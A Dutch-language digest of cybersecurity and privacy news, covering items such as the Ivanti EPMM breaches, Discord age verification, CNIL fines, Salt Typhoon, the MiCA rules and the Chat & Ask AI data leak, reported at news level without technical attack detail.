Ook advocaten lijken kritisch. Janbart Kalk (Kalk & Ural Strafrechtadvocaten) weigert Zivver te gebruiken en te openen. Advocaat Julien Luscuere wijst erop dat alle data op de cloudservice toegankelijk zijn voor Zivver en, op vordering, voor overheden waar het onder valt. Hij geeft aan dat het stoppen van Nederlandse overheidsdiensten met Zivver voor hem de druppel is.

Senior juridisch adviseur Taner Sen vindt dat de Raad voor de rechtspraak niet alleen moet herbeoordelen, maar direct actie moet ondernemen als niet kan worden uitgesloten dat vertrouwelijke informatie via Zivver onder een buitenlands rechtsregime kan vallen. Hij benadrukt dat dit de vertrouwelijkheid, rechtsbescherming en veiligheid van betrokkenen raakt.

Bron: Mr. Online

De Europese Commissie heeft melding gemaakt van een mogelijke datalek als gevolg van een inbraak op een systeem dat gebruikt wordt voor het beheer van mobiele apparaten van medewerkers. Bij de aanval, die op 30 januari werd ontdekt, is mogelijk toegang verkregen tot namen en telefoonnummers van sommige medewerkers.

De Europese Commissie heeft geen details vrijgegeven over het specifieke systeem dat is getroffen, maar de melding komt op dezelfde dag dat bekend werd dat de Autoriteit Persoonsgegevens (AP) en de Raad voor de rechtspraak gehackt waren via een kwetsbaarheid in Ivanti Endpoint Manager Mobile (EPMM), een oplossing voor het beheer van mobiele apparaten. De aanvallers achter de aanval op de AP en Raad voor de rechtspraak hadden dezelfde informatie bemachtigd.

Volgens de verklaring van de Europese Commissie was het getroffen systeem binnen negen uur opgeschoond en zijn er voor zover bekend geen telefoons of andere mobiele apparaten van medewerkers gehackt.

Ivanti Endpoint Manager Mobile (EPMM) is een software engine voor mobile device management (MDM). Organisaties kunnen via deze oplossing de mobiele apparaten van hun medewerkers op afstand beheren, bijvoorbeeld als het gaat om toegestane applicaties of beleid. Een gecompromitteerde EPMM-server kan vergaande gevolgen hebben.

Ivanti heeft recentelijk beveiligingsupdates uitgebracht voor twee actief aangevallen kwetsbaarheden in EPMM: CVE-2026-1281 en CVE-2026-1340. Beide kwetsbaarheden maken het mogelijk voor een ongeauthenticeerde aanvaller op afstand code uit te voeren op kwetsbare servers. De impact van beide beveiligingslekken is beoordeeld met een CVSS-score van 9.8. Misbruik van de kwetsbaarheden vond al plaats voordat de patches beschikbaar waren. Het is niet bekend sinds wanneer de kwetsbaarheden actief werden misbruikt en hoeveel klanten zijn getroffen.

Bron: Europese Commissie

Bron 2: ec.europa.eu

Bron 3: arcticwolf.com

Een Russische rechtbank heeft een 72-jarige Oekraïense gepensioneerde een boete van 30.000 roebel (ongeveer $390) opgelegd wegens het "in diskrediet brengen van het leger" door het liken van video's op YouTube. De rechtbank in Kovdor, Murmansk Oblast, oordeelde dat Vasily Yovdy, een Oekraïense burger met een permanente verblijfsvergunning in Rusland, "goedkeurende commentaren in de vorm van reacties - likes" had achtergelaten onder video's die hij thuis had bekeken.

De FSB-agenten ontdekten de "likes" tijdens een inspectie van Yovdy's telefoon, waarbij ze 139 gelikete video's op zijn privé YouTube-account vonden. De uitspraak specificeerde niet om welke video's het ging, maar vermeldde wel dat twee ervan waren gemaakt door "buitenlandse agenten." Een van de video's ging over de moord op generaal Igor Kirillov, hoofd van de chemische wapens, die in december 2024 in Moskou om het leven kwam door een bom die verborgen was in een elektrische scooter.

Volgens Verstka is dit waarschijnlijk de eerste keer dat iemand is beboet voor het "in diskrediet brengen" van het leger als gevolg van reacties op video's op YouTube. Yevgeny Smirnov, een advocaat van de Russische mensenrechten-NGO First Department, verklaarde dat de rechtbank een interessante constructie had bedacht: "een commentaar in de vorm van een like." Hij voegde eraan toe dat hij een like op zich niet beschouwt als een openbare actie gericht op het in diskrediet brengen van de Russische strijdkrachten, omdat de persoon geen persoonlijke mening heeft geuit of informatie heeft verspreid.

Bron: Kyiv Post

Het communicatieplatform Discord gaat online leeftijdsverificatie verplichten voor gebruikers die volledige toegang tot het platform willen. Gebruikers die hun leeftijd niet verifiëren, worden als minderjarig beschouwd en krijgen beperkingen opgelegd. Discord kwam eind vorig jaar in het nieuws nadat identiteitsbewijzen van 70.000 gebruikers waren gelekt tijdens een identiteitsverificatieproces.

Om hun leeftijd te verifiëren, kunnen gebruikers een gezichtsscan (videoselfie) ondergaan of een kopie van hun identiteitsbewijs met een selfie uploaden naar een van de "vendor partners" van Discord. Het platform claimt dat het in de toekomst meer opties voor leeftijdsverificatie zal aanbieden en dat de maatregel bedoeld is om tieners te beschermen.

Gebruikers zonder geverifieerde leeftijd krijgen te maken met contentfilters, kunnen geen 'age-gated spaces' bezoeken, en privéberichten van onbekende gebruikers worden standaard naar een aparte inbox gestuurd. Ook gelden er 'stage restrictions', waardoor niet-geverifieerde gebruikers niet kunnen spreken in Stage channels. Deze "teen-by-default" instellingen worden vanaf volgende maand wereldwijd gefaseerd ingevoerd.

Bron: discord.com

De Franse privacytoezichthouder CNIL heeft in het afgelopen jaar 78 boetes uitgedeeld aan organisaties en bedrijven wegens overtredingen van de Algemene Verordening Gegevensbescherming (AVG). Het totale boetebedrag kwam uit op 487 miljoen euro. Het grootste deel van dit bedrag is opgelegd aan twee bedrijven: Google en Shein.

Google kreeg een boete van 325 miljoen euro voor het tonen van ongevraagde advertenties in de inboxes van Gmail-gebruikers die eruitzagen als e-mails. Daarnaast ontbrak het aan geïnformeerde toestemming voor het plaatsen van trackingcookies. Shein werd bestraft met een boete van 150 miljoen euro voor het plaatsen van trackingcookies zonder toestemming, het niet respecteren van de keuzes van gebruikers en het onvoldoende informeren van gebruikers over het gebruik van cookies.

Naast de 78 boetes legde CNIL ook drie betalingsverplichtingen op aan organisaties die een eerder opgelegd bevel van CNIL niet hadden nageleefd. Verder stuurde de toezichthouder 143 keer een bevel naar een organisatie om een geconstateerde AVG-inbreuk te stoppen. Volgens de CNIL gaan organisaties vooral de fout in bij het plaatsen van trackingcookies, videosurveillance op de werkvloer en het adequaat beveiligen van persoonsgegevens.

Bron: cnil.fr

Demissionair staatssecretaris Rutte van Justitie en Veiligheid heeft laten weten dat leeftijdsverificatie van legale goksites vaak wordt omzeild via accounts van volwassen kennissen, familie en vrienden. Rutte reageerde hiermee op Kamervragen van het CDA. Kamerlid Straatman had de staatssecretaris gevraagd of hij bereid is om met de Kansspelautoriteit in gesprek te gaan om hardere sancties in te voeren voor aanbieders die leeftijdsverificatie omzeilen of niet kunnen garanderen, zoals het direct offline halen van de site en het intrekken van de vergunning.

Rutte antwoordde dat de Kansspelautoriteit optreedt wanneer een vergunde kansspelaanbieder niet voldoet aan de strenge eisen voor leeftijdsverificatie. Hij voegde eraan toe dat in gevallen dat de leeftijdsverificatie omzeild wordt bij legale aanbieders, dit vaak gebeurt via accounts van volwassen kennissen, familie en vrienden. Bij het illegale aanbod kan de leeftijdsverificatie volledig ontbreken of niet voldoende worden gedaan. Rutte benadrukte het belang van de aanpak van illegaal aanbod en het tegengaan van online gokken bij minderjarigen.

Vorig jaar liet toenmalig staatssecretaris Szabo voor Digitalisering weten dat betrouwbare online leeftijdsverificatie voor online gokken wettelijk is geregeld. Hierbij wordt een relatief groot aantal persoonsgegevens inclusief het BSN verwerkt voor de leeftijdsverificatie, vaak door middel van het verschaffen van een identiteitsbewijs van de aspirant-speler. Deze verplichting tot leeftijdsverificatie hangt samen met de verplichting tot identificatie en verificatie van de identiteit van de aspirant-speler. Het doel van de verwerking van deze persoonsgegevens is het voorkomen van onmatige deelname aan kansspelen of van kansspelverslaving.

Begin dit jaar legde de Kansspelautoriteit een goksite nog een boete op van 4 miljoen euro, onder andere wegens de mogelijkheid om te gokken zonder zichtbare leeftijdsverificatie. De autoriteit stelde dat er bij illegale aanbieders nauwelijks beperkingen zijn en dat zij weinig tot geen aandacht besteden aan verslavingspreventie, spelersbescherming en leeftijdsverificatie.

Bron: Tweede Kamer

In de Tweede Kamer zijn vragen gesteld over de mogelijke risico's van Chinese laadpalen bij gebouwen van de Rijksoverheid. De vragen zijn gericht aan de demissionair ministers Karremans van Economische Zaken, Rijkaart van Binnenlandse Zaken en Van Weel van Buitenlandse Zaken. Aanleiding is de berichtgeving in Trouw over mogelijk meer dan driehonderd laadpalen die het Rijksvastgoedbedrijf wil laten installeren bij zijn ‘kantoorportefeuille’.

Kamerleden Boswijk, Zwinkels (CDA) en Paternotte (D66) hebben de ministers om opheldering gevraagd. Ze willen weten in hoeverre de ministers het risico reëel achten dat slimme laadpalen, die verbonden zijn met digitale netwerken en energie-infrastructuur, kunnen worden misbruikt voor spionage, sabotage of verstoring van vitale infrastructuur.

De Kamerleden vragen ook hoe bij de aanbesteding van de laadpalen rekening is gehouden met nationale veiligheidsrisico’s, zoals cyberveiligheid, databeveiliging en mogelijke ongewenste toegang tot systemen van overheidsgebouwen. Daarnaast willen ze weten of de ministers bereid zijn om voor vitale of gevoelige overheidslocaties een "Europees, tenzij"-benadering toe te passen bij de inkoop van energie- en laadinfrastructuur. De ministers hebben drie weken de tijd om de vragen te beantwoorden.

Bron: tomwetjens

Bron 2: github.com

Bron 3: github.com

Bron 4: ncsc.nl

Bron 5: autoriteitpersoonsgegevens.nl

Microsoft onderzoekt een probleem met Exchange Online waarbij legitieme e-mails ten onrechte als phishing worden gemarkeerd en in quarantaine worden geplaatst. Het incident begon op 5 februari en treft nog steeds Exchange Online-klanten, waardoor ze geen e-mails kunnen verzenden of ontvangen.

Volgens een service alert van Microsoft worden de URL's die aan deze e-mailberichten zijn gekoppeld, ten onrechte als phishing gemarkeerd en in quarantaine geplaatst in Exchange Online. De oorzaak is een nieuwe URL-regel die bedoeld is om meer geavanceerde spam- en phishing-e-mailberichten te identificeren, maar ten onrechte legitieme e-mailberichten in quarantaine plaatst. Microsoft heeft nog niet bekendgemaakt hoeveel klanten of welke regio's door dit probleem worden getroffen, maar heeft het geclassificeerd als een incident, wat doorgaans aanzienlijke impact op gebruikers met zich meebrengt.

Microsoft werkt aan het vrijgeven van e-mails die in quarantaine zijn geplaatst en zegt dat getroffen gebruikers eerder gemarkeerde berichten mogelijk in hun inboxen zullen zien verschijnen. Het bedrijf is bezig met het beoordelen van de vrijgave van berichten in quarantaine voor getroffen gebruikers en werkt aan het bevestigen dat legitieme URL's worden gedeblokkeerd.

In het verleden zijn er vergelijkbare problemen geweest met Exchange Online. In maart werden e-mails van sommige gebruikers ten onrechte in quarantaine geplaatst door antispamsystemen. In mei werden e-mails van Gmail-accounts ten onrechte als spam gemarkeerd door een machine learning model. In september blokkeerde een bug in een antispamservice gebruikers van Exchange Online en Microsoft Teams om URL's te openen en werden sommige van hun e-mails in quarantaine geplaatst.

Bron: Microsoft

Bron 2: wiz.io

Bron 3: tines.com

Top CISO's realiseren zich dat het toevoegen van meer mensen of tools aan de workflow niet de oplossing is voor SOC-teams die te maken hebben met burnout en gemiste SLA's. De oplossing ligt in het sneller en duidelijker verkrijgen van gedragsevidentie. Ze maken sandbox-executie de eerste stap, waardoor teams verdachte bestanden en links in een geïsoleerde omgeving kunnen detoneren en direct real-time gedrag kunnen zien. Dit zorgt voor snellere besluitvorming.

Het prioriteren van sandbox-first workflows leidt tot een daling van MTTR omdat duidelijkheid binnen enkele minuten komt. Runtime-bewijs vervangt aannames, waardoor kwalificatie en containment sneller starten. Tier-1 valideert alerts met gedragsbewijs, waardoor escalaties naar Tier-2 met 30% afnemen en specialisten zich kunnen focussen op echte incidenten. Minder handmatige stappen leiden tot minder burnout. Door alert-kwalificatie evidence-driven te maken, kan tot 21 minuten per case worden bespaard.

Automatisering van triage zorgt voor meetbare winst in respons snelheid, workload balans en SOC-efficiëntie. Geautomatiseerde executie verkort de kloof tussen alert en beslissing, waardoor MTTR direct wordt verminderd. Een consistente aanpak van routine stappen verlaagt het risico tijdens periodes met een hoog volume. Junior medewerkers lossen meer alerts zelfstandig op, waardoor de escalatie load op senior specialisten wordt verminderd. Experts besteden hun tijd aan echte incidenten en niet aan het her-valideren van basis alerts.

Aanvallers verbergen vaak kwaadaardig gedrag achter QR-codes, redirect chains of CAPTCHA gates. Geautomatiseerde sandbox executie handelt deze stappen direct af. Verborgen URL's worden geopend, gating wordt gepasseerd en kwaadaardig gedrag wordt binnen enkele seconden blootgelegd. Analisten kunnen op elk moment live ingrijpen, processen inspecteren of extra acties triggeren, maar worden niet langer belast met repetitief setup werk. Deze combinatie van automatisering en interactiviteit leidt tot snellere respons, lagere workload en meer SOC-capaciteit, zonder extra personeel.

Burnout in de SOC wordt veroorzaakt door constante high-stakes beslissingen die worden genomen met incomplete informatie. Sandbox-first en geautomatiseerde triage workflows veranderen dat. Teams werken vanuit observeerbaar gedrag en krijgen gestructureerde outputs waarop ze direct kunnen reageren: gedragstimelines, geëxtraheerde IOC's, mapped TTP's en duidelijke, deelbare rapporten. Ingebouwde AI-assistentie helpt bij het samenvatten van wat belangrijk is.

Na de overstap naar evidence-based response melden CISO's consistente verbeteringen in de duurzaamheid van hun SOC's. Teams zien een tot 3x hogere SOC-output, MTTR verminderd met tot 50%, tot 30% minder Tier-1 → Tier-2 escalaties, hogere detectie rates voor ontwijkende bedreigingen en minder burnout.

Bron: ANY.RUN

Meer dan honderd internationale organisaties, waaronder de gemeente Amsterdam en het expertisebureau Offlimits, hebben een manifest ondertekend waarin wordt opgeroepen tot een wereldwijd verbod op AI-uitkleedsoftware, ook wel nudifying tools genoemd. Deze technologie wordt voornamelijk misbruikt om beelden van vrouwen, meisjes en kinderen te manipuleren, wat leidt tot ernstige risico's zoals seksuele uitbuiting en chantage.

Recentelijk kwam socialemediaplatform X in opspraak, omdat hun chatbot Grok in staat was nepnaaktbeelden te genereren. Het manifest roept overheden op om binnen twee jaar wetten in te voeren die het gebruik, de verspreiding en de verkoop van deze tools verbieden. Daarnaast wordt er een beroep gedaan op techbedrijven en het publiek om actie te ondernemen tegen deze schadelijke technologieën en de gevolgen ervan te beperken.

Robbert Hoving, bestuurder van Offlimits, benadrukt dat de huidige AI-technologie naaktbeelden kan genereren die niet meer van echt te onderscheiden zijn. Dit heeft vergelijkbare gevolgen voor slachtoffers als bij de verspreiding van echte naaktfoto's, zoals slapeloosheid, schoolverzuim, paniek en zelfs suïcidale gedachten. De beelden worden voornamelijk gebruikt voor sextortion, waarbij meisjes worden gedwongen echte naaktfoto's te sturen of seksuele handelingen te verrichten, en jongens worden afgeperst met de dreiging van verspreiding van nepbeelden als ze geen geld overmaken.

Hoewel veel toepassingen in Nederland al verboden zijn, stopt de wetgeving volgens Hoving bij de grens. Daarom pleit Offlimits voor geharmoniseerde wetgeving op internationaal niveau. Hoving roept technologiebedrijven op om ervoor te zorgen dat hun tools niet misbruikt kunnen worden voor het maken van dit soort beelden. Daarnaast is bewustwording cruciaal, waarbij mensen elkaar moeten aanspreken op dit gedrag en het onderwerp structureel moet worden opgenomen in voorlichtingsprogramma's op scholen.

Het aankomende kabinet wil inzetten op digitale veiligheid en overweegt maatregelen tegen seksuele deepfakes. Offlimits registreerde het afgelopen jaar een stijging van 260 procent van meldingen van mensen die slachtoffer zijn geworden van met AI gemaakt materiaal.

Bron: NOS Tech

Bron 2: ster.nl

Uit onderzoek van de universiteit van Oxford blijkt dat AI-chatbots zoals ChatGPT in minder dan de helft van de gevallen een goed medisch advies geven en slechts in een derde van de gevallen een juiste diagnose stellen. Dit in tegenstelling tot artsen, die bijvragen stellen en inspelen op de nuance en achtergrond van de patiënt. AI-expert Steven Latré van Openchip benadrukt dat AI-assistenten niet kunnen nadenken en daardoor niet goed zijn in het geven van specifiek advies. Artsen daarentegen hebben jarenlange kennis en ervaring met diverse randgevallen.

Patiënten geven vaak een onvolledig beeld in hun vragen aan een chatbot, terwijl ze in een gesprek met een arts meer nuance en details delen. Een dokter kan beter inspelen op relevante context en geschiedenis, en stelt meer vragen. Chatbots daarentegen hebben de neiging mensen te willen tevredenstellen en bevestigen sneller de ideeën van de vragensteller, in plaats van objectief te antwoorden.

Latré voegt eraan toe dat recente studies aantonen dat AI-systemen empathischer kunnen reageren dan typische artsen, wat een voordeel kan zijn. Het is echter van belang te beseffen dat AI-chatbots geen vervanging zijn voor professioneel medisch advies.

Bron: VRT NWS

Bron 2: bsky.app

De Amerikaanse senator Maria Cantwell beschuldigt telecomproviders AT&T en Verizon ervan beveiligingsrapporten over cyberspionage en de veiligheid van hun netwerken tegen te houden. Cantwell heeft een open brief gestuurd aan de voorzitter van de senaatscommissie over handel, waarin ze een hoorzitting voor het Congres eist als de bedrijven de documenten niet openbaar maken.

De beschuldigingen volgen op een claim van de FBI van augustus vorig jaar, waarin staat dat een groep aanvallers, bekend als Salt Typhoon, bij zeker tweehonderd Amerikaanse organisaties en bedrijven in tachtig andere landen heeft ingebroken. Amerikaanse inlichtingendiensten meldden dat de aanvallers grote backbone routers van telecomproviders hadden gecompromitteerd en aangepast om toegang te behouden. Volgens Cantwell zouden ook Amerikaanse telecomproviders tot de getroffen organisaties behoren. AT&T en Verizon beweren dat hun netwerken nu veilig en opgeschoond zijn, maar ze weigeren documenten te delen die dit onderbouwen.

Cantwell uit haar bezorgdheid over het feit dat de telecomproviders mogelijk weinig proactieve veiligheidsmaatregelen hebben genomen vanwege de kosten. Experts twijfelen er volgens haar aan of de aanvallers daadwerkelijk volledig uit de netwerken zijn verwijderd. De senator vroeg AT&T en Verizon om de security assessments van hun netwerken, maar de bedrijven weigerden deze te verstrekken. Vervolgens benaderde Cantwell securitybedrijf Mandiant, dat de assessments had uitgevoerd, maar AT&T en Verizon zouden hebben ingegrepen om te voorkomen dat Mandiant de rapporten zou delen.

Cantwell stelt dat deze gang van zaken serieuze vragen oproept over de huidige beveiliging van de telecomproviders. Ze vindt het zorgwekkend dat de bedrijven geen documentatie kunnen of willen delen die aantoont dat hun netwerken veilig zijn. Ze eist een hoorzitting met de ceo's van beide bedrijven als de vrijgave van de documenten geblokkeerd blijft. Persbureau Reuters heeft AT&T en Verizon om een reactie gevraagd, maar de bedrijven wilden niet inhoudelijk reageren.

Bron: Security.NL

Bron 2: commerce.senate.gov

Bron 3: reuters.com

De Belgische politie heeft een nieuwe preventiecampagne gelanceerd om burgers bewust te maken van de toenemende dreiging van internetoplichting. In 2024 ontving de politie 65.000 meldingen en aangiften van cybercriminaliteit. Christophe Van Bortel, hoofd van de Regional Computer Crime Unit van de Federale gerechtelijke politie Antwerpen, stelt dat de vraag niet is óf iemand slachtoffer wordt, maar wanneer.

Cyberoplichters worden steeds inventiever, waardoor iedereen potentieel slachtoffer kan worden. De #SCAM preventiecampagne, waarbij SCAM staat voor 'Stay Connected. Act Mindfully', is bedoeld om internetgebruikers aan te sporen tot doordacht handelen online. Commissaris-generaal van de Federale Politie, Eric Snoeck, benadrukt het belang van een veiligere digitale omgeving en de noodzaak om de kennis en reflexen op het gebied van online dreigingen te versterken. De Belgische politie zal de komende maanden elke dinsdag een artikel publiceren op haar website om burgers bewust te maken van de risico's.

Bron: Politie.be

De Nederlandse Spoorwegen (NS) heeft een deel van haar automatisering uitbesteed aan een Amerikaans IT-bedrijf. Dit omvat onder andere financiële planning en treinonderhoud, zo bericht NRC. Voorheen werd het grootste deel van de hosting, technisch applicatiebeheer en monitoring door KPN verzorgd. De NS stelt op haar website dat het gebonden is aan het aanbestedingsrecht en daardoor niet de mogelijkheid heeft om Amerikaanse partijen te weigeren of te benadelen.

Volgens de NS zijn de systemen die het Amerikaanse bedrijf gaat beheren "niet missie-kritisch" en verwerken ze geen personeels- of reizigersgegevens. De kritieke systemen voor het rijden van treinen en informatievoorziening zijn ondergebracht bij een Nederlandse IT-partij, aldus een woordvoerder.

Sinds 1 januari 2026 is de Algemene Beveiligingseisen voor Rijksoverheidsopdrachten (ABRO) van kracht, die ministeries en andere overheidsorganisaties verplicht om maatregelen te nemen om de nationale veiligheid en kritieke processen te beschermen. De NS geeft aan dat het niet onder deze wet valt en dat de ABRO geen directe grond biedt om een Amerikaanse partij uit te sluiten.

De NS pleit voor richtlijnen vanuit de overheid om Nederlandse bedrijven te helpen met de strategische autonomie van IT. Het bedrijf stelt dat het huidige aanbod leidt tot grote afhankelijkheid van Amerikaanse bedrijven en dat het onrealistisch is om te verwachten dat die afhankelijkheid op korte termijn wordt opgelost.

Lokke Moerel, hoogleraar global ICT law in Tilburg, is kritisch op de beslissing van de NS en stelt dat de NS miskent dat deze hostingdiensten zelf kritische infrastructuur vormen voor Nederland. Ze benadrukt dat digitale autonomie het uitgangspunt moet zijn en dat de NS met zijn inkoopkracht Nederlandse en Europese aanbieders zou kunnen stimuleren.

Ook beveiligingsexpert Bert Hubert heeft op Mastodon kritiek geuit op de beslissing van de NS. Hij suggereert dat de toenemende afhankelijkheid van buitenlandse partijen wellicht een bewust plan is, aangejaagd door belangen.

Bron: nrc.nl

De volledige uitrol van de Markets in Crypto-Assets Regulation (MiCA) heeft geleid tot een uniform kader voor crypto-activiteiten in alle 27 EU-lidstaten. Voor Crypto-Asset Service Providers (CASP's) betekent dit het einde van regulatory arbitrage en de introductie van uniforme eisen op het gebied van licenties, kapitaal en operationele procedures. Bedrijven die voorheen profiteerden van minder strenge nationale regelingen, staan nu voor de keuze: zich aanpassen aan MiCA of de EU-markt verlaten.

MiCA, formeel Verordening (EU) 2023/1114, is het eerste EU-brede systeem dat specifiek is ontworpen voor crypto-assets en aanverwante diensten. Het is van toepassing op beurzen, bewaarders, brokers, portefeuillebeheerders en handelsplatformen die diensten aanbieden aan EU-burgers. Om legaal te opereren, moet een CASP gevestigd zijn in een EU-lidstaat en geautoriseerd zijn door een nationale toezichthouder. Na goedkeuring is de licentie geldig in de hele Unie.

MiCA deelt CASP's in drie licentieklassen in, elk met toenemende wettelijke en kapitaaleisen: Klasse 1 omvat adviesdiensten, orderdoorgifte, portefeuillebeheer en crypto-overdrachten, met een minimumkapitaalvereiste van €50.000. Klasse 2 voegt bewaar- en wisseldiensten toe, waardoor de kapitaaldrempel stijgt naar €125.000. Klasse 3 omvat de exploitatie van een handelsplatform en vereist minimaal €150.000 aan kapitaal. De classificatie bepaalt niet alleen het kapitaal, maar ook de diepgang van governance, risicocontroles en rapportageverplichtingen.

MiCA-compliance omvat meer dan alleen minimumkapitaal. Bestuurders en belangrijke aandeelhouders moeten voldoen aan "fit and proper"-normen. Toezichthouders beoordelen de professionele achtergrond, reputatie en besluitvormingscapaciteit, inclusief controles van criminele en financiële antecedenten. Klantgelden en crypto-assets moeten strikt gescheiden zijn van bedrijfsactiva. Deze eis is bedoeld om gebruikers te beschermen in geval van insolventie en om vermenging te voorkomen. CASP's moeten veerkrachtige IT-systemen, incident response mogelijkheden en continuïteitsplanning aantonen om storingen of cyberincidenten te weerstaan, in lijn met de Digital Operational Resilience Act (DORA). Bedrijven moeten eigen middelen of verzekeringsdekking aanhouden die evenredig is aan de aangeboden diensten, zodat ze operationele en juridische schokken kunnen opvangen.

Malta blijft een belangrijke jurisdictie voor crypto-bedrijven die overstappen naar het MiCA-kader. Tsjechië is een alternatief toegangspunt voor bedrijven die prioriteit geven aan kostenbeheersing en flexibiliteit. Een van de belangrijkste kenmerken van MiCA is passporting. Na autorisatie in één lidstaat kan een CASP diensten aanbieden in de hele EU zonder extra nationale licenties aan te vragen.

CASP's moeten voldoen aan de crypto "Travel Rule", die vereist dat gegevens van de initiatiefnemer en begunstigde transacties vergezellen, in overeenstemming met de bijgewerkte AML-regels en de Transfer of Funds Regulation. Extra verplichtingen omvatten transactiemonitoring, screening op sancties, melding van verdachte activiteiten en openbaarmaking van voorkennis om marktmanipulatie te voorkomen. Het MiCA-autorisatieproces omvat operationele gap-analyse, bedrijfsstructurering, beleidsdocumentatie, wettelijke indiening en toezichtbeoordeling. Goedgekeurde bedrijven worden opgenomen in het centrale register van geautoriseerde CASP's van de EU.

MiCA verhoogt de kosten van toegang, maar filtert ook ondergekapitaliseerde en zwak bestuurde operators eruit. Bedrijven die compliance bereiken, krijgen wettelijke duidelijkheid, EU-brede toegang tot de markt en verbeterde geloofwaardigheid bij banken en institutionele partners.

Bron: HackRead

Bron 2: esma.europa.eu

Bron 3: gov.uk

Bron 4: eur-lex.europa.eu

Bron 5: eiopa.europa.eu

Bron 6: gov.u

Microsoft breidt de mogelijkheden voor dreigingsdetectie binnen Microsoft Teams aanzienlijk uit door gebruikers van Defender for Office 365 Plan 1 de mogelijkheid te geven om direct verdachte berichten te melden. Deze update, Roadmap ID 531760, markeert een verschuiving in de beveiligingsstrategie van Microsoft door het verzamelen van dreigingsinformatie te democratiseren. Deze functie was voorheen alleen beschikbaar voor Plan 2-abonnees.

Volgens een update van 9 februari 2026 komt deze uitrol tegemoet aan de groeiende noodzaak om samenwerkingsplatforms net zo agressief te beveiligen als e-mailomgevingen. De lijnen tussen interne communicatie en externe dreigingen vervagen, waardoor het essentieel is geworden om eindgebruikers in staat te stellen als eerste verdedigingslinie op te treden.

Voorheen was de mogelijkheid om berichten binnen Teams te rapporteren, exclusief voor organisaties met Defender for Office 365 Plan 2. Plan 1-omgevingen waren afhankelijk van geautomatiseerde backend-beveiligingen zonder real-time feedback van gebruikers. De nieuwe update verenigt deze ervaring. Zodra de uitrol eind maart 2026 is voltooid, kunnen Plan 1-gebruikers berichten in twee categorieën taggen: "Security Risk" voor inhoud die verdacht wordt van phishing, malware of spam, en "Not a Security Risk" voor legitieme berichten die onterecht zijn gemarkeerd door geautomatiseerde filters (valse positieven).

Deze door gebruikers gegenereerde signalen zijn van vitaal belang voor security operations centers (SOC's). Ze bieden direct inzicht in potentiële inbreuken en helpen de detectie-algoritmen van Microsoft te trainen om nuances in conversationele aanvallen beter te herkennen, zoals business email compromise (BEC) pogingen via chat.

Hoewel deze functie de beveiliging verbetert, vereist het administratieve actie om te functioneren. Microsoft heeft benadrukt dat de rapportagemogelijkheid een opt-in functie is. Om zich voor te bereiden op de lancering medio maart, moeten beveiligingsbeheerders naar de Microsoft Defender portal navigeren. Door de instellingen voor "User reported" in te schakelen, worden de schakelaars voor Teams-rapportage automatisch geactiveerd. Rapporten die door gebruikers worden ingediend, stromen vervolgens naar de pagina "User reported" in de Defender portal of naar een specifieke mailbox die door het IT-team is geconfigureerd, waardoor gecentraliseerde triage en onderzoek mogelijk is.

Deze stap komt op een moment dat aanvallers steeds vaker wegdraaien van traditionele e-mail phishing naar samenwerkingstools. Platforms zoals Teams worden vaak gezien als "vertrouwde ruimtes" door werknemers, waardoor ze vatbaar zijn voor social engineering aanvallen. Door gebruikersfeedback rechtstreeks in de Defender detectielus te integreren, kunnen organisaties sneller reageren op campagnes die geautomatiseerde filters omzeilen. Beveiligingsteams wordt geadviseerd hun interne documentatie bij te werken en deze wijzigingen aan het personeel te communiceren, zodat werknemers weten hoe en wanneer ze verdachte activiteiten moeten melden wanneer de functie volgende maand live gaat.

Bron: Microsoft

De populaire mobiele applicatie "Chat & Ask AI" heeft onbedoeld honderden miljoenen privégebruikersgesprekken blootgelegd. De app, die meer dan 50 miljoen gebruikers heeft in de Google Play en Apple App stores, heeft nagelaten de backend-database te beveiligen, waardoor ongeautoriseerde toegang tot gevoelige gebruikersgegevens mogelijk was.

Het lek ontstond door een verkeerde configuratie op het Google Firebase-platform, dat ontwikkelaars gebruiken om mobiele apps te bouwen. Hoewel Firebase een standaardtool is, vereist het een zorgvuldige installatie om de beveiliging te waarborgen. In dit geval waren de instellingen in een standaardstatus gelaten waardoor iedereen zichzelf kon aanmerken als een "geverifieerde" gebruiker. Deze simpele fout gaf toegang tot de backend-opslag van de app.

De omvang van het lek is enorm. Een onderzoeker meldde toegang tot ongeveer 300 miljoen berichten van meer dan 25 miljoen gebruikers. Volgens rapporten van 404media bevatte de blootgestelde database uitgebreide logboeken van gebruikersactiviteit, waaronder volledige geschiedenissen van gesprekken met de AI, tijdstempels van wanneer chats plaatsvonden, aangepaste namen die gebruikers aan hun AI-metgezellen gaven, specifieke configuraties en het type AI-model dat werd gebruikt (zoals ChatGPT, Claude of Gemini). De inhoud van deze berichten benadrukt de ernstige privacy-implicaties van de inbreuk.

Een analyse van een voorbeeldgegevensset van 60.000 gebruikers en een miljoen berichten onthulde zeer persoonlijke en potentieel gevaarlijke vragen. Gebruikers hadden de AI om instructies gevraagd over het produceren van illegale drugs zoals methamfetamine, over het hacken van andere applicaties, en, nog verontrustender, advies over zelfmoord en het schrijven van zelfmoordbrieven.

"Chat & Ask AI" functioneert als een "wrapper"-app. Dit betekent dat het niet zijn eigen AI-brein runt; in plaats daarvan verbindt het gebruikers met krachtige modellen van grote bedrijven zoals OpenAI, Google en Anthropic. Hoewel de onderliggende AI-modellen (zoals ChatGPT) niet waren gecompromitteerd, diende de wrapper-app als een zwakke schakel, die gesprekken onveilig opsloeg. Gebruikers wordt geadviseerd voorzichtig te zijn met de persoonlijke informatie die ze delen met AI-tools van derden en app-rechten en reputaties zorgvuldig te bekijken.

Bron: 404media

Het Amerikaanse Cybersecurity and Infrastructure Security Agency (CISA) heeft op 10 februari 2026 een alert uitgegeven naar aanleiding van een cyberincident in de Poolse energiesector in december 2025. Het incident, waarbij operationele technologie (OT) en industriële controlesystemen (ICS) werden gecompromitteerd, benadrukt de noodzaak voor kritieke infrastructuur om hun cybersecurity te versterken, met name met betrekking tot kwetsbare edge devices.

Volgens het rapport van CERT Polska, het Poolse Computer Emergency Response Team, kregen de aanvallers toegang via kwetsbare, met het internet verbonden edge devices. Vervolgens werd wiper malware ingezet, wat schade veroorzaakte aan remote terminal units (RTU's). De aanval resulteerde in verlies van zicht en controle tussen faciliteiten en distribution system operators, vernietigde data op human machine interfaces (HMI's) en corrumpeerde systeemfirmware op OT-devices. Hoewel de getroffen hernieuwbare energiesystemen hun productie voortzetten, kon de systeembeheerder ze niet controleren of monitoren zoals bedoeld.

